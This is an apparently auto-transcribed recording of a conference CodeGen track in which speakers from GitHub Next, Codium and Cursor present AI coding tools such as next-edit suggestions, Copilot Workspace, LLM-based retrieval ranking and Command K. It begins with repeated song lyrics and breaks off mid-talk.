I'm missing you. Because I'm missing you. Because I'm missing you. I'm missing you. I'm missing you. I'm missing you. Picking up my heart. From every piece that's broken. Been trying to get back to myself but don't have a clue. I'm looking for someone. Can't find a door that's open.

I'm losing all my hope. Feels like I'm left here in two. Because I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you.

I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you. I'm missing you. Thank you. All right. Great. Hey, everyone. So excited to be welcoming you to the CodeGen track here at the AI Engineer World's Fair. My name is Brittany Walker. I am a GP at Charles River Ventures, a.k.a.

CRV. We are an early-stage venture capital firm investing primarily at seed and Series A rounds, and we've been around for 54 years, believe it or not. There, my focus is primarily on infrastructure and have done a bunch of AI infrastructure investments in the past couple years, which is how I've gotten to know SWIX, our gracious host, relatively well.

And very excited about the topic of CodeGen, as I'm sure all of you are here today. To walk through this topic, we're going to have some amazing speakers. We're going to have Rahul Pandita joining us from GitHub. We're going to have Kevin Howe joining us from CodeGen, and then we're going to have Michael Terrell joining us from Cursor.

We're going to lead things with Rahul. He works at GitHub Next, specifically, and works on the Copilot Workspaces product in that context. I'm sure all of you are familiar with GitHub Copilot, probably the number one AI product that has taken the world by storm in the past year, year and a half here, and incredible statistics around its adoption, downloads, all of that.

He can tell you more, but excited to have him walking us through some of his efforts today. Thank you. Hello, everyone. How are you today? Pretty good. Pretty good. I guess this is the afternoon session, so I'm standing between you and your lunch, so I'll try to get this as quickly as possible.

Hi. My name is Rahul Pandita, and I am a researcher at GitHub Next. And today, we're going to talk about some of the GitHub Next explorations. Now, before we begin, who among you have heard of GitHub Next? Oh, cool. Quite a few of you. That will make it go much easier and much faster.

All right. For those of you who don't know us, we are about 20 bunch of researchers, seniorish-level developers, and mostly tool builders who work outside of the regular product and report directly to our CEO. And that's by design. And that's by design. And our goal is to explore the future of software engineering like you all are doing in your day-to-day jobs.

And the reason for exploring that is that, like, once we do our explorations, we toss it on and we pass it on our learnings to the product and development teams so that they can build really compelling products like the co-pilot that you all have used, hopefully, at some point of time.

As an aside, for people who are following us on Twitter, I don't look anything like my picture over here. I'm the one in the green background. But we do have Devon in our team. He's not an automated AI. He's a very real person, and he looks exactly like the person on the top right corner on that slide.

All right. Since we have gotten that out of the way, let's talk about... Let's get back to the future of software engineering with regards to Gen AI. So here's what Andrew Ning, who single-handedly trained a whole generation of machine learning engineers, has to say about AI. That it's just as electricity.

It's the new electricity. It's going to transform the software development and almost every other field, just like electricity did 100 years ago. So what does that mean? Here's a picture of what a manufacturing facility looked like before electrification. There used to be a giant, mostly coal-powered steam turbine or steam engine located centrally, which used to turn these giant shafts, which would turn these auxiliary shafts, so forth and so on, and individual workers would connect to these shafts using the belt and pulley system, right?

And these engines were, like, really, really huge. So it was the workers, the whole architecture of the factory were designed around this steam engine. And the whole workflow was around the steam engine. And it was the workers who were working around the technology rather than the technology working for people, right?

And along in 1880 came these electric motors, and they had the potential to revolutionize the manufacturing sector. Why? Because unlike steam engines or steam engines or steam motors, they retained their efficiency when they were smaller, right? So you could basically redesign the entire factory floor plan. So you would think that, wow, this is great, and everyone would jump on this.

But it was not until 1920s where these became the mainstream. So early 1880s to late 1920s. What was happening for about these 40 years? What was happening was exploration and experimentation. People were trying to figure out how to use this technology, how to make it better, how to de-risk it to a point that the use of this technology becomes the norm, rather than the exception.

And that's what we do at GitHub Next, right? Our charter is to explore the future of software engineering. And with the emphasis on the word explore, right? Because if we knew what the future of software engineering in context of AI looks like, we would just build it. That's more efficient.

But unfortunately, we do not. So what we have to resort to is exploration. We just try out different things, rapidly prototype, experiment, and figure out whether something works or not. And if it works, then we put it out in front of our customers and users, and we learn from them, and then we finally transform into a product.

Oftentimes, an idea begins as a functional prototype, which goes through heavy dogfooding inside the next team. If it survives that, then we move on to the next level of dogfooding that is inside the company. If it survives that, then we move on to the next level, which is releasing it as a tech preview to other early adopters.

We learn from that. If it survives that, then it may have a chance to become a product like that, a product in the future. And we can kill or we can shelve any of these explorations at any point of time, if we are not getting the right signal, so that we can explore other areas.

We did that with the Copilot. So yes, Copilot started off as a next experiment. And since that, we have created many other experiments like Copilot for CLI, Copilot Voice, GitHub Blocks, speclangs, so forth and so on. A lot of these have transformed into a product of their own, so you can see some of them as GitHub product offerings.

A lot of them have been absorbed into existing products, and you will see them as a part of the existing products. And a significant number of them have been shelled. We've learned what we learned from those experiments and figured out that this is not the right time for that kind of exploration or the exploration itself was flawed.

But we learned from them and we will keep that learning and use that in our next explorations. So there was an overview of GitHub Next, and today I'm going to talk about two specific explorations. One is the next edit suggestions in the Copilot workspace that are currently active from GitHub Next perspective.

And specifically, I'm going to talk about what their motivations was and how they came to be and what are the future plans for that. So, first off, Copilot next edit suggestions, right? So what if, it started off with this question, what if ghost text could be more intelligent, right?

So we all know what Copilot does, it provides you the code completions in your current context, right? It's like really, really good at creating new code, but that's not what we all do, right? We, we, we almost always edit existing code, which involves editing, adding, deleting lines at multiple locations in a program, right?

What if ghost text was good at that as well? And that's what this exploration is. We call it next edit suggestion, which provides you suggestions not only at the current cursor level, but provides you suggestions what else needs to change in a program. But enough talking, let's jump on to a demo.

All right. Here, I am going to add this parameter in this Python program. And the next edit suggestion automatically picks it up and says that, hey, you need to update your method definition. Once we update the method definition, it says that, hey, you need to add these, these, these arguments.

And once that has been updated, then it will go back and say, hey, now the code document is not, is not in line with what the code is actually doing. And it goes ahead and edits that and updates that as well. And the same thing repeats when I add one more parameter.

All right? So that was Copilot next edit suggestions experiment. We are still not ready yet. We are still experimenting with a bunch of other stuff like, you know, is the ghost text completion the right modality for it? Or do we need to figure out a bit different, different way of presenting those suggestions?

What if the location of the next edit is not visible in the current viewport? Or what if the location is in a file that is not even open in an editor? Most importantly, we are also working on fine-tuning the models specifically for this use case, the idea being that, like, if we want the next edit suggestions to be accurate and we want it to be very useful, then the suggestions needs to be on point.

And once we are done with these further sub-explorations and we feel that it has gotten through our internal dog fooding standard, next edit suggestions would be coming out either as a standalone tech preview from Next or as a part of an existing Next product sometime in your IDE in the next few months.

All right. So there was code completions, but let's move from the code completions to the task completions land. Why do we ask? Why move from the task completions? It just turns out that while code is like an important artifact that comes out of software development, but it's not the only artifact.

Software development involves this inner loop where you begin with a task, the idea is like what am I supposed to do? What is the specific thing that I'm trying to do? And followed by how do I go about doing that thing? What are the frameworks that are at my disposal?

What are the programming languages that are at my disposal? What is the existing code that's there? How do I write a new code that is consistent with those codes? So that becomes a sort of a specification. And once you understand where you are, then you sort of try to decide, like, where am I going with it?

Like, how does the final product look like? Once you have zeroed in on that, then you go about what specific file changes do I need to make to get to that final product? And that sort of becomes a plan. And once you get to the plan, then you go to the implementation part.

And that forms this loop of software development. And we call it inner loop. And we would like the AI to be helpful in all those aspects of that inner loop. And that's why we built co-pilot workspace. And mind you, like all Nix explorations, it did not start as co-pilot workspace.

It started as individual explorations. For instance, we started to figure out, can we use natural language as a functional specification of programs? So there is a spec lang exploration. In parallel, we were trying to figure out if we can improve the code completions by providing, by prompting the model with the runtime information.

And all of those things combined, and with the user feedback combined into this one bigger exploration called co-pilot workspace. And we were also talking to our users. Like, we wanted to talk to developers and we wanted to ask that, hey, we are building this thing. How would you like AI to support you?

What are your major pain points? And a few things became very, very clear while talking to our users, right? So first thing is that the most difficulty that people faced was getting started on a task. Like, how do I -- I know that an issue is assigned to me.

How do I get started on it? Followed by, how do I trust the output of the AI? I don't trust it. And more importantly, they figured out that problem solving is what software development is about. And they would like to retain that problem solving aspects of it. And they would like the help of AI in the form of AI in the form of a thought partner, or a sparring partner, or a second brain, which they can collaborate with to solve a problem.

And lastly, and most importantly, they would like to retain control. Developers are in control, not the other way around. And with this feedback, we build Copilot workspace. So what is it? It allows you to -- it simplifies getting started. So one-click proposal on your tasks. It has a built-in runtime that allows you to quickly verify what the code that has been provided by the AI.

It has an environment which is built for iteration. So if you feel that AI is going in the wrong direction, you can just go and quickly correct it. And most importantly, it is designed for collaboration. So you can just share your code or your work as a part of the GitHub pull request, or you can share your work or share your workspace with your colleagues if you're not comfortable with it.

But let's -- enough talking. Let's just get into a demo about it, right? So this is Monospace, which is another GitHub exploration. So if we are to write code, let's write code in style. And these are the four -- is a family of Monospace fonts that has been released by GitHub.

And this is a website that outlines a bunch of features of these fonts. And over here, somewhere over here, is this playground which says that -- here are how the syntax highlighting looks across different languages. Notice that it is missing Rust. And Rust appears to be the next cool thing that all the cool kids are doing.

So we would like to update this Monospace website with a Rust example as well. So how do I get started? So I've created this issue, or somebody has created this issue. It just happens to be me for the purpose of this demo that I would like to create -- I would like to add a Rust example to the font playground.

And I can just click this button over here, and it will open the Copilot workspace for me. And through the magic of caching, you can see that it quickly generates the specification and -- current specification and the proposed specification. Why caching? Because I had to finish this demo in time.

But trust me, it's not a matter of hours. It does happen in a matter of minutes, right? And for those of you who are interested, I would like to do a live demo for you in the Microsoft booth after this task. All right. So what is the current specification?

It just goes and figures out, does the website have this playground that contains a Rust package? And it says that it doesn't. And it goes to the target state. Would -- where would the target -- what does the target state look like? And it would say that, yes, the website will have the specific package for syntax highlighting.

The website will have this package in -- in -- in package.json. And then I will update a bunch of other files. It looks nice. And I'll go and generate a plan for it. Again, through the magic of caching, a plan has been generated. And it will tell you that these three files -- these three files need to be updated.

And I will -- it appears that this seems to be at the right level of modality. Then I will go ahead and implement it. And yes, magic of caching again. What we see is the files that are over here. Now, this seems nice. But what about the iterator part?

What you can do is, at any given point of time, if you feel that something is not right, you can just go ahead and say that, okay, add Rust to the language mappings. And say, add code documentation. And you can edit at any given point of time. And what you can also do is that you can edit via chat over here.

And you can say that, hey, I want to edit this one specific location. How do I go about doing this? I'm not going to do this because it's going to go through the whole iteration loop. And then the illusion of the caching will break. And it will take a lot of time.

But I would like to show that in live demos afterwards. But how do I trust whether this is, in fact, the right thing? So I will open up this integrated terminal. And I will say, install and run this repo. All right, so what's going to happen is that a suggestion is going to load, and apparently not the right thing.

But I can quickly go and edit it and say that, all right, this is the command that I'm specifically looking for. And I can go and run. Now, this will run this command in an actual terminal. And we'll see the output in some point of time. And you can see that actually this code does compile.

What we also have is a preview. What we can do is open the live preview. I don't trust it. It will say that it's just going to be a second, but it takes longer than that while that loads. What are the other things? One of the things that you would say is that, hey, you wrote a very simple command in the terminal.

You said npm. You could actually type that thing in the terminal. And yes, you're right. I can type that thing. But think about that in a mobile setting, when you can open Copilot workspace on your phone. It becomes very tedious to type those symbols, right? And if you have used the mobile keyboard, it's not very useful for that.

So that's why we use this natural language way of writing these commands in the terminal, so that it can help you when you're on the go. It can synthesize those commands. And hopefully, the website has loaded. And there is a Rust example, right? Cool. There was a demo. And thank you.

We are working -- we are not stopping there. We are working on a bunch of these improvements. And I can talk about these improvements on one-on-one basis with you. And you already saw some of the improvements, like the runtime support to synthesize the terminal commands and faster file completions using to make the Copilot workspace better.

But there are other next explorations that are also active. Like, how do we rethink the developer learning with AI? And how does the code review change if majority of the code that is now being written is by AI? So what does that mean? And some of these explorations will work out.

And some of these explorations you will see as tech previews. And some of these explorations will kill because we don't know where they're going. So in summary, I'm saying that we do not know what the future of AI is. But what we know is explorations is the way to get it.

And with all your help, we'll jointly explore the space so that we don't have to wait. Like electricity, we don't have to wait for 40 years to get to a place where -- to get to a place with software development where we enjoy the benefits of AI. You have been a lovely audience.

That is my time. I really appreciate you. And if you have more questions, if you want to have live demos, I'm available in the Microsoft booth in, like, two salons over that side. Thank you so much. Okay. Thank you so much for that. That was truly incredible demo and some amazing work you guys are doing over there at GitHub Next.

As Rahul mentioned, for all of our speakers today, we're not going to be taking live questions. So I'm going to ask you guys to go and find them after the fact. As Rahul mentioned, he'll be at the Microsoft booth over in the Expo and then we'll give you locations for the other speakers as they finish up as well.

Next we have Kevin Howe. He is the head of product engineering at Codium. This is probably one of the most incredible pivot stories in AI of the past year and a half. The company used to be Exifunction and now one of the best code assistant products out there actually voted by developers as the highest satisfaction code assistant product recently in a stack overflow survey and just hit a million downloads in VS code last month, which is truly incredible.

So I'm going to welcome him to the stage, Kevin Howe, head of product engineering. All right. Cool. Thank you, Rahul. We are going to kick it off with, let's see, make sure that's not my slack up there. Cool. All right, all set. So my name is Kevin and I'm going to be talking about how embeddings are stunting AI agents.

So I'm going to let you in on some secrets about how we build the product and exactly what we're doing behind the scenes to improve your code gen experience. So at Codium, we are building AI developer tools and we're starting with an IDE plugin. And as mentioned before, we've been downloaded over a million and a half times.

We're one of the top rated extensions across the different marketplaces. And to reiterate, we offer free unlimited autocomplete, chat and search across 70 different languages and 40 different IDs. So we plug into all the popular IDs. We are the highest rated developer tool as voted in by developers in the most recent stack overflow survey.

And you'll note that this is even higher than tools like chat GPT and GitHub Copilot. And importantly, we are trusted by fortune 500s to deliver high quality code that actually makes it into production. And we do this with top grade security licensing attribution for some of the largest enterprises on the planet.

Our goal at Codium is to empower every developer to have superpowers both inside of the IDE and beyond. And today, I'm going to let you in on some secrets about how we've been able to build a tool like this and why users choose us over the other AI tools on the market.

And the short answer is context awareness. So here's a quick overview about what context looks like today. We're all familiar since we're at an AI conference with the basics of retrieval augmented generation, the idea being that a user puts in a query, you accumulate context from a variety of different sources, you throw it into your LLM, and then you get a response, whether that be a code generation or a chat message.

Here's a concrete example about how retrieval can be used in code generation. So let's say we want to build a contact form in React. Now, you could go to chat GPT, you could ask it to generate a contact form. But in reality, on a moderately large code base, this is really not going to work.

It's not going to give you things that are personalized to you. And this is really where context retrieval comes in. We need to build a contact form that, you know, is in line with our design system components. Let's say you already have buttons and inputs. It has to be able to pattern match with with local local instances of other forms inside of your code base.

It has to ingest your style guide. For example, if you're using Tailwind, you have to be able to detect and make the form look and feel like every other thing on your site. And then of course, there's documentation both locally and externally for packages and other dependencies. So the question becomes, how do you collect and rank these items so that our code generation can be both fast and accurate for your use case?

So to dive into a couple of different methods about how people are tackling this today, there's really three main pillars. The first one is long context. So this is the idea that if you expand your prompt window in your LLM, it can read more input and therefore be a bit more personal to what you're trying to put, what you're trying to generate, right?

You just shove more items into your prompt. But this comes at the cost of latency and financial cost. So one of the most recent examples was Gemini. Gemini actually takes 36 seconds to ingest 325k tokens. To put this into perspective, a moderately sized or even small repo is easily over 1 million tokens.

And that accounts to about 100k lines of code. So in this instance, most enterprises have over a billion tokens of code. It's simply not feasible to be throwing everything into a long context model. The second method is fine tuning. So for those that are familiar, fine tuning is the idea of actually tweaking the weights of your model to reflect the distribution of the data that your consumer expects, right?

And so this requires continuous updates. It's rather expensive computationally. You have to have one model per customer and it's honestly prohibitively expensive for most applications. And finally, we have embeddings. And for all of you, hopefully you're familiar, this is a relatively proven technology today. It's pretty inexpensive to compute and store.

But the difficulty that we're about to dive into is that it is hard to reason over multiple items. It also has a low dimensional space. And I'll talk about that shortly. So to dive deeper into embeddings, the whole concept is that you take your objects, you throw it through an embedding model, and then you end up with some sort of vector, some sort of array of numerical values.

And this is in a fixed dimension. And so by mapping and chunking code, we can map it to an embedding. And that allows us to quickly search over our functions, our documents, whatever you decide to chunk by. And this is what embedding search is called. Embedding search, like I said, is not a new concept.

There is a bunch of model models that I've tried to optimize. And in this example, we're looking at one of the kind of North Star eval benchmarks. It's become increasingly popular. And the question becomes, how do we fit millions of lines of code into an LLM model so that we can actually generate useful results?

And so it's evident through the years that we're actually hitting a ceiling on what is possible using these traditional vector embeddings. And over time, even the biggest models are approximating to around the same level of performance. As you can see, everything's kind of within plus or minus five. And at Codium, we kind of believe that this is because fundamentally, we cannot distill the dimension space of all possible questions, all possible English queries, down into the embedding dimension space that our vectors are going to occupy.

And so at Codium, we've thought very critically about what retrieval matters to us. Are we measuring the right things? And does semantic distance between these vectors really equate to things like function relevance in the concrete example that I showed earlier? And so what we landed on is that benchmarks, like the one that I showed you before, heavily skew towards this idea of needle in a haystack.

It's the idea that you can sift through a corpus of text and find some instance of something that is relevant to you. Note, it is only one single needle. So in reality, code search requires multiple different needles, right? We showed that slide earlier, when you're building a contact form, you need all these different things in order to actually have a good generation.

And these benchmarks really don't touch that. And so we decided to use a different metric, and it's called Recall 50. The idea and its definition is that it's what fraction of your ground truth is in the top 50 items retrieved. So the idea being now we have multiple documents, and we're now looking at the top 50 documents that we retrieved.

How many of those are part of our ground truth set? So this is really helpful for understanding document, multi-document context, especially again for those large, large code bases. And now we actually have to build a data set around this. And so this is where we did a little bit of magic.

We wanted to make the eval as close as possible to our end user distribution. So we had to compile our own data set. So what we did, this is a PR that I put out a few months ago, we looked at PRs like this. It's broken down into commits.

Those commits we can extract and actually match them with the modified files, right? So now we have this mapping from something in English to a list of files that are relevant to that change. And you can imagine we can hash this in many different ways, but ultimately the point I'm trying to make is we are creating a eval set that mimics our production usage of something like a code gen product.

And so this message serves as the backing for this new type of eval where now we can run at scale this idea of product-led benchmarks. It gets us closer to the ground truth of what our users are actually experiencing and what retrieval tweaks and retrieval actually mean to the end product.

And so we threw some of the currently publicly available models at this notion of retrieval, this idea of using commit messages, and we found that there is reduced performance. They're unable to reason over specifically code, but then also specifically this kind of real-world notion of English and commits, right?

And so at Codium, we've been able to actually break through the ceiling. This is something that we've worked very hard at. We have to redefine exactly how we are approaching retrieval in order to be kind of in our class of our own so that when you are typing in your ID, when you're chatting with our assistant, when you're generating autocompletes, we're retrieving the most relevant things that are for your intents.

So now the question becomes, how do we actually get this kind of best-in-class retrieval? And so I'm here to give you the very short and sweet answer, which is we throw more compute at it, right? But of course, that can't come with absurd, absurd cost, right? Financial cost. So how do we do this actually in production?

How do we actually do this without recurring an unreasonable cost? And so this goes back to a little bit of Codium secret sauce, right? We are vertically integrated. And what this means is that we train our own models. So number one, we train our own models. This means that these are custom to our own workflows.

So when you're using our product, you're touching Codium's models. Number two, we build our own custom infrastructure. This is actually a very important point and actually connects to the whole ExaFunction to Codium Pivot that we discussed earlier. ExaFunction was a ML infrastructure company. And so what we've been able to do is build our own custom infrastructure down to the metal.

This means that our speed and efficiency is unmatched by any other competitor on the market so that we can serve more completions at a cheaper cost. And finally, we are product-driven, not research-driven. Now, what this means is we look at things like actual end-user results. When we actually ship a feature, we're looking at real-world usage, and we're always thinking about how does this impact the end-user experience, not just some local benchmark tweaking.

And so we could spend all day talking about, you know, kind of why Codium has done this and yada-yada, but that's a talk for a different time. So I'm going to talk about something that I find very cool, and this is the reason why we've taken this vertical integration approach and been able to turn it into something that we call mQuery.

So mQuery is this way of taking your query, so similar, it's that idea of taking your retrieval query. You have your code base, and let's just say you have n different items. And because we own our own infrastructure and train our own models, we're now making parallel calls to an LLM to actually reason over each one of those items.

We're not looking at vectors. We're not looking at small dimension space. We're literally taking models and running them on each one of those items so that you can ensure, you can imagine, you know, you run ChatGPT and tell it to say yes or no on an item, for example.

That is going to give you the highest quality, highest dimension space of reasoning. This leads into very, very high confidence ranking that we can then take into account things like your active files, your neighboring directories, your most recent commits. You know, what is the ticket that you're working on currently?

We can compile all this to give you, you know, the top end documents that are relevant for your generations that we can start streaming in higher quality generations, higher quality chat messages, things of that nature. And the reason behind this is, again, it's that vertical integration. It's that idea that our computation is 1/100 of the cost of the competitors.

We are not using APIs. And as a result, our customers and our users actually get 100x the amount of compute that they would on another product. And so we're willing to do that. We're willing to spend more compute per user because it leads to a better experience. And so, like I mentioned earlier, I lead our product engineering team.

So we always want to anchor ourselves around these three different things. One, that we have to build a performant product. It has to be really fast. For those of you that have used the product, you can probably attest to this. MQuery runs thousands of LLMs in parallel, so the user can start streaming in code within seconds, not minutes, not hours, seconds, and oftentimes milliseconds.

It has to be powerful. Right? None of this matters if the actual quality and the actual generations that you're building are wrong. Right? And finally, it has to be easy to use. We're building an end user product for people today that's in the IDE. Tomorrow, it might not be in the IDE.

How do we actually build something that is intuitive to understand that people can grapple with and see exactly what my model is thinking? And so, because we have the benefit of distribution, we were able to roll this out to a small percentage of our users. And by small percentage, we're dealing in the order of, you know, a million plus downloads.

This actually reached the surprising number of people. And what we've been able to see is that we were able to successfully reason over these thousands of files in people's mono repos, in people's remote repos, and select what was relevant. Right? We can very accurately deem which files are relevant for the generation that you're trying to have.

And the result, as you can see, this is a real-time GIF, is both fast and accurate. So I'm asking for usage of an alert dialogue. It's going through, and I think I've panned down here. This is kind of a shad CN component that I've modified internally. We're pulling in basically the source code of what is relevant for our generation.

And ultimately, the results of this experiment were that users were happy. They had more thumbs up on chat messages. They were accepting more generations. And we were able to see that ultimately, we were writing more code for the user, which is the ultimate goal. It's that idea of how much value are we providing to our end users.

And so we built this context engine. Right? This idea of mQuery. This idea of ingesting context and deciding what is relevant to your query to give you coding superpowers. And so our users will generate today, they're generating autocompletes. They're generating chats, search messages. But in the future, they're going to generate documentation.

They're going to generate commit messages, code reviews, code scanning. They're going to take, you know, Figma artboards and convert them into UIs that were built by your own components. The possibilities are endless. But what it starts with is this bedrock, this very hard problem of retrieval. And it brings us to, again, one of the reasons why Codium is approaching this problem a little bit differently.

Our iteration cycle starts with product-driven data and eval. So we're starting with the end problem. We're building a product for millions of people. How do we start with what they're asking for? And how do we build a data set and eval system locally so that we can iterate on the metrics that matter?

Secondly, because we're vertically integrated, we're taking that massive amount of compute and we're going to throw it at our users. You know, paying or not paying, we're going to throw it at our users so that they can get the best product experience and the highest quality results. And then finally, we're actually going to be able to push this out to our users in real time, overnight, and be able to get a pulse check on how this is going.

You know, this is what we did for M query. And when we evaluate in production, we can say, you know, thumbs up, thumbs down, and then hit the drawing board again, back to that same cycle, repetition. And so you can start seeing how these pieces of compounding technology come together, right?

We've alluded to some of them today, modeling, infrastructure, being able to retrieve. But then it also includes things like AST parsing, indexing massive amounts of repos, knowledge graphs, parsing documentation, looking at websites online, the list can go on and on and on. But we're confident that we're solving these problems one piece at a time using that same iteration cycle, that same idea that we're going to take the distribution and knowledge that we have, and that additional compute that we're willing to afford each user to solve each one of these puzzle pieces.

And I want to leave you with a parallel analogy. So in my past life, I had experienced the autonomous driving industry. So to bring over a metaphor from that industry, in 2015, TechCrunch boldly predicted that that was going to be the year of the self-driving vehicle. It was largely, you know, now we're in 2024, so we can look back in hindsight, largely untrue, right?

We were doing things like sensor fusion, we were decreasing our polling rates, we were running offboard models, all this in the effort of making heuristics that would compensate for the lack of compute that was available, because consumer graphics cards were not as popular or not as powerful as they are today.

Fast forward today, we're seeing 100x the amount of compute available to a vehicle. You can take a Waymo around San Francisco, which I encourage you to do, it's a wonderful experience. But that means that we're actually able to throw larger models at these problems, right? More sensors, higher frequency.

And now 2024, TechCrunch has released another article that said, will 2024 finally be the year of the self-driving vehicle? And we can now look at this pattern and say, driving performance was substantially better by throwing larger models, being able to handle more and more data. And so at Codium, we believe that this embedding-based retrieval is the heuristic.

We should be planning for AI-first products, throwing large models at these problems, so that AI is a first-class citizen. We're planning for the future. And finally, we also believe that ideas are cheap. You know, I could sit up here and tell you all these different ideas about how, you know, we're going to transform coding and the way that the theory behind possible solutions.

But what we believe at Codium is that actually shipping, actually showcasing this technology through a product, is the best way to go. And so if you agree with these beliefs, you can come join our team. We're based in San Francisco, and you can download our extension. It's free. I'm not, obviously, what's it called?

I'm not advertising the core product nearly as much. We're kind of talking about the technology, but you can experience this technology firsthand today by downloading our extension. It's available on all the different plugins: VS Code, JetBrains, Vim, Emacs. And you can see how this infrastructure and the way that we've approached product development has shaped the experience for you as a user.

And then, of course, you can reach out to me on Twitter. I put my handle up there. I'll be kind of floating around outside, so if you have other questions or are interested in what I had to say. But I hope that you learned something today. I hope that, you know, you use Codium, you try it out, and see what the magic can do for yourself.

Thank you. Thank you so much, Kevin. And you guys can find Kevin outside the salon after the tracks have wrapped if you have any follow-up questions for him. Next, I'm very, very excited to bring up to the stage Michael Truel. He is the co-founder of Cursor and previously created Halite at Two Sigma, which is an artificial intelligence programming challenge back when he was an intern there.

And it still persists today inside Two Sigma. Cursor, as you guys may all know, is one of the most popular AI codegen tools out there right now. I can't count the number of Twitter mentions I see of the tool every single day. And on top of that, they count amongst their users, customers like Shopify, Samsung, OpenAI, Ramp, Replicate, the list goes on and on.

So very excited to be bringing up Michael to talk through this incredible product. Michael Truel: Can the audience hear me? Okay, amazing. Great to be here. I'm also here with Swalle, my co-founder. Thanks for having us. We're going to talk through Cursor and give you a high level of sense of what we'd like to do over the next few years and then do a little bit of a deep dive into some of what we've built so far.

And then, if there's time, we can take audience Q&A at the end. And so here on the first slide, this is to set up kind of the problem that we're nerd-snaped by, which is what does programming look like in the age of AI. And to frame this, this is a little bit anachronistic because no one really wrote x86 and they didn't do it in terminal.app.

But on the left here, sort of in the 1980s, before then, we had machine code. And then over the next many decades, humanity invented things like high-level programming languages and syntax highlighting and navigation features and links to make building software much easier. And this transformed developer productivity. And so over the next five to ten years, we think that level of a productivity jump is going to happen many times over in a much more compressed time frame.

And we're really nerd-snaped by this problem of what is the equivalent of a high-level programming language, what is the equivalent of all of this tooling around programming languages in the AI age. And so just to frame the problem and talk a little bit about how some other folks are thinking through it, I think that, you know, in the popular discourse, there are kind of, by and large, two ways people are approaching the problem of how does AI affect programming.

One is this kind of agent approach, which seems to advocate for, you know, programming kind of goes away, ceases to exist as kind of a high-level profession. Anyone can build software. And mostly, the way we build software will be through, you know, PRDs or chat messages that then get turned into code bases or big code changes.

And then on the other side of things, you know, there are folks who are building, you know, really useful plug-ins to existing coding environments and are kind of nipping at the edges of, you know, we can make ghost text autocomplete better. And we certainly can. And, you know, we can optimize the developer experience in little ways.

And to contrast this with how we're thinking through the problem, we think that programming is still going to exist in five years. It will still be a profession. Programmers will still be paid a lot of money. It will still be a technical discipline. But it's going to change a ton.

And it's not going to demand just a plug-in to an existing coding environment. It's going to demand an entirely new tool for doing software engineering. And so this focus on really pushing the ceiling of the amount of work the tool can take on while keeping the programmer in the driver's seat is our focus as a company.

And so to talk through a little bit, you know, what we've built so far. So we've built, you know, our product is called Cursor. It's a code editor that's built for programming with AI. And our goal is to be the best tool for professional programmers to use AI. And so far, we've focused on a few two areas, mostly around code writing and Q&A.

And I want to talk through a couple of the pieces of things we've built in the code writing bucket. Because they also kind of illustrate why you would need a new dev environment for this and not just a plug-in to an existing coding environment. So one is we focused on predicting the next move of a programmer in a code base.

And this started with, you know, great works-- great work from folks at Copilot with Ghost Text Autocomplete. And we took this idea to kind of the next level of, you know, if you're a programmer working within a code base, you're not always just typing characters after your cursor. Sometimes you're jumping to a completely new place.

Sometimes you're doing a diff. You know, you're deleting lines. You're inserting code in different places. And so we trained a model to predict your next edit within a code base and the next place you're going to jump to. And the result is an autocomplete system we called Copilot++ that can predict these things.

And kind of the second piece of the product I want to talk through is called Command K, which lets you go from instruction to code and select a part of the code base, ask for it to be changed, and then iterate with the AI on that block of code.

And so I can talk through some of the technical details of how we went about building each of these, both on the model side of things and also maybe on the editor side of things, too. Okay, so Copilot++. So it started off with, you know, when we first wrote our vision for what we wanted to do, the first line in there was like, oh, Copilot should do your next edit.

But over the next, like, couple of months, every time we would prototype something, it would include something like strikethroughs or it would move your cursor a ton when you were typing and that was super annoying. Or the model just wasn't accurate enough. Around October and November of last year, we had a couple of very interesting breakthroughs.

One of them was learning how to use the trajectories of programmers. So, you know, you go from one file to another file, using commit histories to learn how, like, programmers do diff after diff after diff of these, like, coherent edits, and then learning a model to predict them. And combined with them are -- we had to come up with this side-by-side edit UX.

And the nice thing about it is super easy to put parse, but also, like, it's not something that's super intrusive when you're typing. On the command K end of things, the super interesting problem for us was how to make it both low friction. So you could -- if you have an instruction you want to type in a couple of characters, you can do it very quickly.

But also, just pull in context from across your repository or across your recent files so we don't make a mistake. We still are on the journey for making both of them even more accurate. And, you know, every couple of weeks we have either new model updates or new context updates.

You know, if you used cursor, like, six months ago, I'd recommend trying it again. And you'd find it both much faster and also much more accurate. Yeah. And both of these, you know, both of these pieces of code writing are just the beginning. They're also, you know, in addition to what Swali said, which is, you know, we're always optimizing the background context building for these things.

We're optimizing the models. We're optimizing the UX in little ways. These, we think, are also the start of a journey when it comes to the final form factor for what programming looks like with AI. Two directions that we're especially excited about in the future, in addition to building off of these.

One is under the bucket of making programming feel like writing and reading pseudocode. And so you're already seeing the right side of things here, where now the key strokes people are typing in their code editor are not really corresponding to Go and Rust and Type Scrapped. You know, people are writing things that are much more terse and kind of look a little bit like gibberish and they're getting expanded into code by the diff-based autocomplete.

Or they're writing, you know, higher level instructions and they're getting turned into code changes by command K. And then on the read side of things, one thing we're experimenting with is, you know, are there times when it makes sense to trade off the formalism of a real programming language with concision?

And, you know, sometimes it might make sense to give the programmer kind of a slider that lets them control the level of abstraction of the code base that they're looking at and lets them look at something that looks a little bit more like pseudocode and lets them both read and use that for navigation and then also edit that and have the changes get made down at the source code by the AI.

And so this idea of, you know, still giving programmers control, both control over the level of abstraction and also letting them, you know, gesture at specific instructions in a code base instead of stepping back and, you know, having to write something like a PRD, which is, you know, very divorced from the code, is, you know, an example of one of the things, you know, sort of the idea space that we're really interested in.

And then another bucket that we're super interested in for the future is letting the AI do kind of constrained tasks in the background. Like I mentioned before, there's a lot of interest in agents having bots do things end-to-end, use tools, maybe go from a PRD to an entire code base or a big set of code changes.

We think that for professional programmers, for a long time, the tech's going to need to progress before we can really talk about end-to-end automation of PRs. And instead, in the meantime, the way that this technology is going to be deployed is you're going to really constrain what the AI can do, you know, write the interface for a method or a class and ask the AI to go implement that.

And then you can go use that method or class yourself. But, you know, give the AI more of a latency budget, you know, five minutes to go implement that stuff instead of the, you know, 10-15 seconds that are required if you're working with it in the loop. And have a constrained agent go and work on that code.

And already, you know, both here on the pseudocode side of things and especially on the constrained background agent side of things, we have internal experiments that look very promising. And so maybe to talk a little bit through kind of some of the tech aspects of what's been required of to build both Copilot++, Command K, you know, these next action prediction and instruction of code respectively features, and then also the Q&A and chat and debugging features that we've built so far.

